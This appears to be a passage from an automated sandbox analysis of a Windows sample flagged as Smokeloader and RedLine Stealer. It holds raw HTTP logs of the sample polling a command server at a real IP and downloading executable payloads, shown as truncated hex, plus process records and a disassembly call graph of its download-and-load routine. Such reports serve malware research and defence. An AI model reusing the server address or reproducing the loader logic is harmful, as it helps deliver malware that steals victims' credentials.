                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:18.559938908 CEST203INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:18 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=93
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:20.585094929 CEST394OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:20.809391022 CEST203INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:20 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=92
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:22.835894108 CEST394OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:23.061348915 CEST203INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:22 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=91
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:25.084901094 CEST394OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:25.314899921 CEST203INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:25 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=90
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:27.335062027 CEST394OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:27.563453913 CEST203INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:27 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=89
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:29.585211992 CEST394OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:29.827352047 CEST203INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:29 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=88
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:31.850446939 CEST394OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:32.068552017 CEST394OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:32.381088018 CEST394OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:32.794883013 CEST203INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:32 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=87
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:34.820627928 CEST394OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:35.065159082 CEST203INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:34 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=86
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Oct 8, 2024 04:24:38.116286039 CEST393OUTGET /soft/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: d
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:38.355118990 CEST1236INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:38 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Disposition: attachment; filename="dll";
                                                Content-Length: 242176
                                                Keep-Alive: timeout=5, max=85
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                                Oct 8, 2024 04:24:38.857721090 CEST393OUTGET /soft/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: s
                                                Host: 80.66.75.114
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 8, 2024 04:24:39.204221010 CEST1236INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 02:24:38 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Disposition: attachment; filename="soft";
                                                Content-Length: 1502720
                                                Keep-Alive: timeout=5, max=84
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-a


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:22:24:01
                                                Start date:07/10/2024
                                                Path:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\nRGKqzVQRt.exe"
                                                Imagebase:0x400000
                                                File size:465'920 bytes
                                                MD5 hash:75C689774E5B58A3C4CED392928B6053
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:22:24:04
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 732
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:22:24:04
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 772
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:22:24:05
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 772
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:11
                                                Start time:22:24:06
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 792
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:13
                                                Start time:22:24:07
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 528
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:15
                                                Start time:22:24:08
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1016
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:19
                                                Start time:22:24:40
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1468
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:22
                                                Start time:22:24:43
                                                Start date:07/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 1292
                                                Imagebase:0xa60000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:2.6%
                                                  Dynamic/Decrypted Code Coverage:33.7%
                                                  Signature Coverage:13.6%
                                                  Total number of Nodes:1322
                                                  Total number of Limit Nodes:53
                                                  execution_graph 51979 401840 51980 4018a9 InternetSetFilePointer InternetReadFile 51979->51980 51981 40193d __FrameHandler3::FrameUnwindToState 51980->51981 51982 401962 HttpQueryInfoA 51981->51982 51983 401ce5 51982->51983 51984 401986 CoCreateInstance 51982->51984 52036 40cd83 51983->52036 51984->51983 51987 4019bf 51984->51987 51986 401d10 51987->51983 52007 402460 51987->52007 51989 401a1c MultiByteToWideChar 52022 40cfd1 51989->52022 51991 401a6e MultiByteToWideChar 51992 401ad0 51991->51992 51992->51992 52033 402300 27 API calls 4 library calls 51992->52033 51994 401bc0 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 51997 40cfd1 27 API calls 51994->51997 52000 401cb1 51994->52000 51995 401aec 51995->51994 51996 401d16 51995->51996 52043 411337 51996->52043 52001 401bf7 51997->52001 52000->51983 52001->52000 52002 40cfd1 27 API calls 52001->52002 52006 401c84 52001->52006 52004 401c74 52002->52004 52034 401470 25 API calls 4 library calls 52004->52034 52035 401470 25 API calls 4 library calls 52006->52035 52010 40247e _Yarn 52007->52010 52012 4024a4 52007->52012 52008 40258e 52050 401660 27 API calls 52008->52050 52010->51989 52011 402593 52051 4015c0 27 API calls 2 library calls 52011->52051 52012->52008 52014 4024f8 52012->52014 52015 40251d 52012->52015 52014->52011 52048 4015c0 27 API calls 4 library calls 52014->52048 52020 402509 _Yarn 52015->52020 52049 4015c0 27 API calls 4 library calls 52015->52049 52016 402598 52019 411337 25 API calls 52019->52008 52020->52019 52021 402570 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 52020->52021 52021->51989 52024 40cf93 52022->52024 52025 40cfb2 52024->52025 52028 4015c0 Concurrency::cancel_current_task 52024->52028 52054 41657c EnterCriticalSection LeaveCriticalSection std::_Facet_Register 52024->52054 52055 4133dd 52024->52055 52025->51991 52027 40cfbe 52027->52027 52028->52027 52052 40e393 RaiseException 52028->52052 52030 4015dc 52053 40e131 26 API calls 3 library calls 52030->52053 52032 401603 52032->51991 52033->51995 52034->52006 52035->52000 52037 40cd8b 52036->52037 52038 40cd8c IsProcessorFeaturePresent 52036->52038 52037->51986 52040 40cdd3 52038->52040 52064 40cd96 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 52040->52064 52042 40ceb6 52042->51986 52065 4112c3 25 API calls 3 library calls 52043->52065 52045 411346 52066 411354 11 API calls __FrameHandler3::FrameUnwindToState 52045->52066 52047 411353 52048->52020 52049->52020 52051->52016 52052->52030 52053->52032 52054->52024 52060 41a395 __Getctype 52055->52060 52056 41a3d3 52063 411401 14 API calls __dosmaperr 52056->52063 52058 41a3be RtlAllocateHeap 52059 41a3d1 52058->52059 52058->52060 52059->52024 52060->52056 52060->52058 52062 41657c EnterCriticalSection LeaveCriticalSection std::_Facet_Register 52060->52062 52062->52060 52063->52059 52064->52042 52065->52045 52066->52047 52067 402c60 52068 402c84 SetLastError 52067->52068 52069 402cac 52067->52069 52145 402910 71 API calls 52068->52145 52070 402cb6 52069->52070 52072 402cf1 SetLastError 52069->52072 52080 402d19 52069->52080 52146 402910 71 API calls 52070->52146 52147 402910 71 API calls 52072->52147 52073 402c96 52074 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52073->52074 52077 402ca8 52074->52077 52078 402cc0 SetLastError 52081 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52078->52081 52079 402d03 52082 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52079->52082 52080->52070 52083 402d84 GetNativeSystemInfo 52080->52083 52084 402cdd 52081->52084 52085 402d15 52082->52085 52083->52070 52086 402db3 VirtualAlloc 52083->52086 52087 402df3 GetProcessHeap HeapAlloc 52086->52087 52088 402dcd VirtualAlloc 52086->52088 52089 402e10 VirtualFree 52087->52089 52090 402e24 52087->52090 52088->52087 52091 402ddf 52088->52091 52089->52090 52092 402e6c SetLastError 52090->52092 52093 402e8e VirtualAlloc 52090->52093 52148 402910 71 API calls 52091->52148 52095 402e74 52092->52095 52103 402ea7 _Yarn __FrameHandler3::FrameUnwindToState 52093->52103 52149 4033c0 16 API calls std::locale::_Locimp::~_Locimp 52095->52149 52096 402de9 52096->52087 52098 402e7b 52099 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52098->52099 52100 402e8a 52099->52100 52102 402f8c 52122 402a70 52102->52122 52103->52092 52103->52095 52103->52102 52121 402be0 VirtualAlloc 52103->52121 52104 403155 52105 402940 77 API calls 52104->52105 52106 403166 52105->52106 52106->52095 52114 40316e 52106->52114 52107 40302c 52107->52095 52107->52104 52130 402940 52107->52130 52109 4031fa 52111 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52109->52111 52110 4031aa 52112 4031e4 52110->52112 52113 4031b5 52110->52113 52115 403210 52111->52115 52116 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52112->52116 52118 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52113->52118 52114->52109 52114->52110 52117 4031f6 52116->52117 52119 4031e0 52118->52119 52121->52103 52123 402bcc 52122->52123 52124 402a90 52122->52124 52123->52107 52124->52123 52125 402bbb SetLastError 52124->52125 52126 402b9e SetLastError 52124->52126 52128 402b7f SetLastError 52124->52128 52125->52107 52126->52107 52128->52107 52131 402959 52130->52131 52140 402995 52130->52140 52132 4029ae VirtualProtect 52131->52132 52137 402964 52131->52137 52134 4029f2 GetLastError FormatMessageA 52132->52134 52132->52140 52133 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52135 4029aa 52133->52135 52136 402a17 52134->52136 52135->52107 52136->52136 52138 402a1e LocalAlloc 52136->52138 52137->52140 52150 402c00 VirtualFree 52137->52150 52151 4028d0 69 API calls 52138->52151 52140->52133 52141 402a41 OutputDebugStringA LocalFree LocalFree 52142 40cd83 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 52141->52142 52143 402a67 52142->52143 52143->52107 52145->52073 52146->52078 52147->52079 52148->52096 52149->52098 52150->52140 52151->52141 52152 10001f20 52195 10005956 GetSystemTimeAsFileTime 52152->52195 52154 10001f48 52197 100059d5 52154->52197 52156 10001f4f CallUnexpected 52200 10001523 52156->52200 52158 10002174 52230 100010a3 52158->52230 52163 10002025 52233 10001cdd 49 API calls __EH_prolog3_GS 52163->52233 52166 1000202e 52167 10002164 52166->52167 52234 100059b4 37 API calls _unexpected 52166->52234 52169 10001bb9 25 API calls 52167->52169 52171 10002172 52169->52171 52170 10002040 52235 10001c33 39 API calls 52170->52235 52171->52158 52173 10002052 52236 10002493 27 API calls __InternalCxxFrameHandler 52173->52236 52175 1000205f 52237 10002230 27 API calls __InternalCxxFrameHandler 52175->52237 52177 10002079 52238 10002230 27 API calls __InternalCxxFrameHandler 52177->52238 52179 1000209f 52239 1000219f 27 API calls __InternalCxxFrameHandler 52179->52239 52181 100020a9 52240 10001bb9 52181->52240 52184 10001bb9 25 API calls 52185 100020bb 52184->52185 52186 10001bb9 25 API calls 52185->52186 52187 100020c4 52186->52187 52244 10001725 8 API calls _ValidateLocalCookies 52187->52244 52189 100020df CallUnexpected 52190 10002100 CreateProcessA 52189->52190 52191 10002135 52190->52191 52192 1000213c ShellExecuteA 52190->52192 52191->52192 52193 1000215b 52191->52193 52192->52193 52194 10001bb9 25 API calls 52193->52194 52194->52167 52196 10005988 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 52195->52196 52196->52154 52245 10006e9c GetLastError 52197->52245 52201 1000152f __EH_prolog3_GS 52200->52201 52289 1000184b 52201->52289 52204 10001593 52293 1000190a 52204->52293 52205 100015ff 52298 1000179a 52205->52298 52206 10001541 52206->52204 52213 1000179a 27 API calls 52206->52213 52208 1000160d 52303 10005939 52208->52303 52211 10001650 InternetSetOptionA InternetConnectA 52215 10001692 HttpOpenRequestA 52211->52215 52216 100016e8 InternetCloseHandle 52211->52216 52212 100016eb 52214 10001704 52212->52214 52352 10001bdc 25 API calls 52212->52352 52213->52204 52218 10001bb9 25 API calls 52214->52218 52219 100016e2 InternetCloseHandle 52215->52219 52220 100016bc 52215->52220 52216->52212 52222 1000171b 52218->52222 52219->52216 52306 100010c7 52220->52306 52353 1000e8a5 52222->52353 52225 100016d3 52320 10001175 52225->52320 52226 100016df InternetCloseHandle 52226->52219 52231 100010ad 52230->52231 52232 100010bd CoUninitialize 52231->52232 52233->52166 52234->52170 52235->52173 52236->52175 52237->52177 52238->52179 52239->52181 52241 10001bc4 52240->52241 52242 10001bcc 52240->52242 52404 10001bdc 25 API calls 52241->52404 52242->52184 52244->52189 52246 10006eb3 52245->52246 52250 10006eb9 52245->52250 52274 10007580 6 API calls __dosmaperr 52246->52274 52249 10006ed7 52251 10006ebf SetLastError 52249->52251 52252 10006edb 52249->52252 52250->52251 52275 100075bf 6 API calls __dosmaperr 52250->52275 52258 10006f53 52251->52258 52259 100059df 52251->52259 52276 10007aa7 14 API calls __dosmaperr 52252->52276 52254 10006ee7 52256 10006f06 52254->52256 52257 10006eef 52254->52257 52284 100075bf 6 API calls __dosmaperr 52256->52284 52277 100075bf 6 API calls __dosmaperr 52257->52277 52287 10006928 37 API calls CallUnexpected 52258->52287 52259->52156 52263 10006efd 52278 10007a3c 52263->52278 52265 10006f12 52266 10006f16 52265->52266 52267 10006f27 52265->52267 52285 100075bf 6 API calls __dosmaperr 52266->52285 52286 10006c9e 14 API calls __dosmaperr 52267->52286 52271 10006f32 52273 10007a3c _free 14 API calls 52271->52273 52272 10006f03 52272->52251 52273->52272 52274->52250 52275->52249 52276->52254 52277->52263 52279 10007a70 __dosmaperr 52278->52279 52280 10007a47 RtlFreeHeap 52278->52280 52279->52272 52280->52279 52281 10007a5c 52280->52281 52288 10005926 14 API calls __dosmaperr 52281->52288 52283 10007a62 GetLastError 52283->52279 52284->52265 52285->52263 52286->52271 52288->52283 52290 10001868 52289->52290 52290->52290 52291 1000190a 27 API calls 52290->52291 52292 1000187c 52291->52292 52292->52206 52294 10001978 52293->52294 52297 10001920 __InternalCxxFrameHandler 52293->52297 52356 10001a59 27 API calls std::_Xinvalid_argument 52294->52356 52297->52205 52299 100017eb 52298->52299 52302 100017b3 __InternalCxxFrameHandler 52298->52302 52357 10001884 27 API calls 52299->52357 